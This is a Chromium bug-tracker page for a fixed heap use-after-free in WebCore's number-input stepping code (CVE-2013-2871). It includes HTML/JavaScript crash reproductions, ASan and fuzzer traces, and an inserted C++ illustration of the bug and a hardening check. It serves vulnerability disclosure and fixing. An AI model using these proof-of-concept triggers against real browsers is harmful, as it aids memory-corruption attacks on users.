Issue 243991 Heap-use-after-free in WebCore::InputType::stepUpFromRenderer
Reported by miau...@gmail.com, May 25 2013
Status: Fixed
Owner:
Closed: May 2013
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: ----
Type: Bug-Security
VULNERABILITY DETAILS
use-after-free in WebCore::InputType::stepUpFromRenderer(int)

VERSION
Chrome Version: stable+dev
Operating System: linux 64bit, osx

REPRODUCTION CASE

USER INTERACTION REQUIRED: you must press up or down arrows when the input is focused.

<html>
  <head>
    <script>
      onload = function() {
        el0 = document.createElement('input')
        el0.type = 'number'
        document.body.appendChild(el0)
        window.addEventListener('change', function(){ el0.type = '' }, false)
        el0.focus()
      }
    </script>
  </head>
  <body>
    press Up or Down arrows
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==13639== ERROR: AddressSanitizer: heap-use-after-free on address 0x600e00010558 at pc 0x7f4008e8a1f9 bp 0x7fffc75e1a90 sp 0x7fffc75e1a88
READ of size 8 at 0x600e00010558 thread T0 (asan-stable)
    #0 0x7f4008e8a1f8 in element /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/InputType.h:317:0
    #1 0x7f4008e8a1f8 in WebCore::InputType::stepUpFromRenderer(int) /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/InputType.cpp:1117:0
    #2 0x7f4008eae704 in WebCore::TextFieldInputType::handleKeydownEventForSpinButton(WebCore::KeyboardEvent*) /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/TextFieldInputType.cpp:161:0
    #3 0x7f4008ea07a1 in WebCore::NumberInputType::handleKeydownEvent(WebCore::KeyboardEvent*) 

0x600e00010558 is located 8 bytes inside of 72-byte region [0x600e00010550,0x600e00010598)
freed by thread T0 (asan-stable) here:
    #0 0x7f4006f23462 in free ??:0
    #1 0x7f4008dfba26 in deleteOwnedPtr<WebCore::InputType> /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WTF/wtf/OwnPtrCommon.h:63:0
    #2 0x7f4008dfba26 in operator= /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WTF/wtf/OwnPtr.h:141:0
    #3 0x7f4008dfba26 in WebCore::HTMLInputElement::updateType() 

Attachments: 872.txt (23.0 KB), 872.html (367 bytes)
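As an added illustration (not Blink's code, and not the fix landed in r151175, which the page does not show), a minimal C++ model of the ownership pattern behind this report: the element owns its InputType, a script change listener replaces the type mid-step, and the step would otherwise continue on the freed object. The hardened step re-checks ownership after dispatching the event; InputElement, runScenario and the rest are assumed names for the model.

```cpp
#include <functional>
#include <memory>
#include <string>
struct InputElement;

// Minimal model of the ownership behind this report (added example, not Blink
// code): InputElement owns its InputType through a unique_ptr, as
// HTMLInputElement does through OwnPtr<InputType>; updateType() swaps it and
// the old InputType is deleted immediately.
struct InputType {
    InputElement* element;   // back-pointer, like InputType::element()
    std::string name;
    InputType(InputElement* e, const std::string& n) : element(e), name(n) {}
    // Returns true if the step completed, false if it bailed out because the
    // element no longer owned this InputType once the change event returned.
    bool stepUpFromRenderer(int n);
};

struct InputElement {
    std::unique_ptr<InputType> type;
    std::function<void(InputElement&)> onChange;   // the page's 'change' listener
    int value = 0;
    void updateType(const std::string& newType) {
        type = std::make_unique<InputType>(this, newType);   // frees the old one
    }
    void dispatchChange() { if (onChange) onChange(*this); }
};

bool InputType::stepUpFromRenderer(int n) {
    // Copy the owner pointer into a local before dispatching: script running in
    // the listener may replace the type, after which 'this' is freed.
    InputElement* el = element;
    el->value += n;
    el->dispatchChange();              // may call el->updateType("") re-entrantly
    // The vulnerable flow reads this->element() here (InputType.h:317 in the
    // ASan trace). Comparing pointer values dereferences nothing, so this
    // ownership check is safe even if 'this' has already been deleted.
    if (el->type.get() != this)
        return false;                  // replaced during dispatch: stop here
    return true;                       // still owned: members are safe to use
}

// Constructed scenario mirroring the repro: a type=number element whose change
// listener sets type='' while the step is still in progress.
int runScenario(bool listenerChangesType) {
    InputElement el;
    el.updateType("number");
    if (listenerChangesType)
        el.onChange = [](InputElement& e) { e.updateType(""); };
    return el.type->stepUpFromRenderer(1) ? 1 : 0;
}
```

Another fix shape for this bug class is to keep the old InputType alive until event dispatch has finished, so that no re-entrant type change can free the object whose method is still on the stack.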
Comment 1 by miau...@gmail.com, May 25 2013
stable asan log
Attachment: stable872.txt (21.2 KB)
Cc: keishi@chromium.org yosin@chromium.org ksakamoto@chromium.org
Owner: tkent@chromium.org
Status: Assigned
These input element event handler type change bugs are sprouting all over the place. Please help to kill this madness.
Comment 3 by tkent@chromium.org, May 27 2013
Labels: Security_Impact-Stable Security_Impact-Beta M-27
Status: Started
Comment 4 by tkent@chromium.org, May 27 2013
This is a regression by http://trac.webkit.org/changeset/94658

Labels: Security_Severity-High OS-All Stability-Memory-AddressSanitizer
We caught this in our fuzzers as well.
Summary: Heap-use-after-free in WebCore::InputType::stepUpFromRenderer (was: Security: use-after-free in WebCore::InputType::stepUpFromRenderer(int))
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=188312355

Fuzzer: Inferno_layout_test_fuzzer

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x607000094e58
Crash State:
  - crash stack -
  WebCore::InputType::stepUpFromRenderer
  WebCore::TextFieldInputType::handleKeydownEventForSpinButton
  - free stack -
  WebCore::HTMLInputElement::updateType
  WebCore::HTMLInputElement::parseAttribute
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702

Minimized Testcase (0.44 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv96aAPoAfiQ64Bx2C2kjvL1CtWDPoLvTF3sKUHhy_z9cyI8pmwm-Ed-i5vgizLTj4ENbjMmFvSawmQwZ5jNJI0uCcWieYQJrl7HjZ4sZg71aSfEouk_U8LyzL_Wory4Fy7quFrDR_9WMkZ0J0JajQDvUR76FrQ
<input type="number" onchange="handleChange(this);">
<script>
function sendKey(keyName) {
    var event = document.createEvent('KeyboardEvent');
    event.initKeyboardEvent('keydown', true, true, document.defaultView, keyName);
    document.activeElement.dispatchEvent(event);
}

function handleChange(element) {
    element.type = '';
}

var numberInput = document.getElementsByTagName('input')[0];
numberInput.focus();
sendKey('Up');

</script>
Labels: Security-Code28
Project Member Comment 8 by clusterf...@chromium.org, May 28 2013
ClusterFuzz has detected this issue as fixed in range 202382:202420.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=188312355

Fuzzer: Inferno_layout_test_fuzzer

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x607000094e58
Crash State:
  - crash stack -
  WebCore::InputType::stepUpFromRenderer
  WebCore::TextFieldInputType::handleKeydownEventForSpinButton
  - free stack -
  WebCore::HTMLInputElement::updateType
  WebCore::HTMLInputElement::parseAttribute
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702
Fixed: https://cluster-fuzz.appspot.com/revisions?range=202382:202420

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96aAPoAfiQ64Bx2C2kjvL1CtWDPoLvTF3sKUHhy_z9cyI8pmwm-Ed-i5vgizLTj4ENbjMmFvSawmQwZ5jNJI0uCcWieYQJrl7HjZ4sZg71aSfEouk_U8LyzL_Wory4Fy7quFrDR_9WMkZ0J0JajQDvUR76FrQ

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
https://src.chromium.org/viewvc/blink?view=rev&revision=151175
Labels: -M-27 -Merge-Approved M-28 Merge-Merged Release-0 reward-topanel
M28: r152059
Labels: -reward-topanel reward-unpaid reward-1000
$1000 for this one. Thanks again!

*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties.
*********************************
Labels: CVE-2013-2871
Labels: -reward-unpaid reward-inprocess
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Labels: -reward-inprocess
Project Member Comment 16 by clusterf...@chromium.org, Feb 2 2016
Labels: -Security_Impact-Beta
Project Member Comment 17 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 18 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic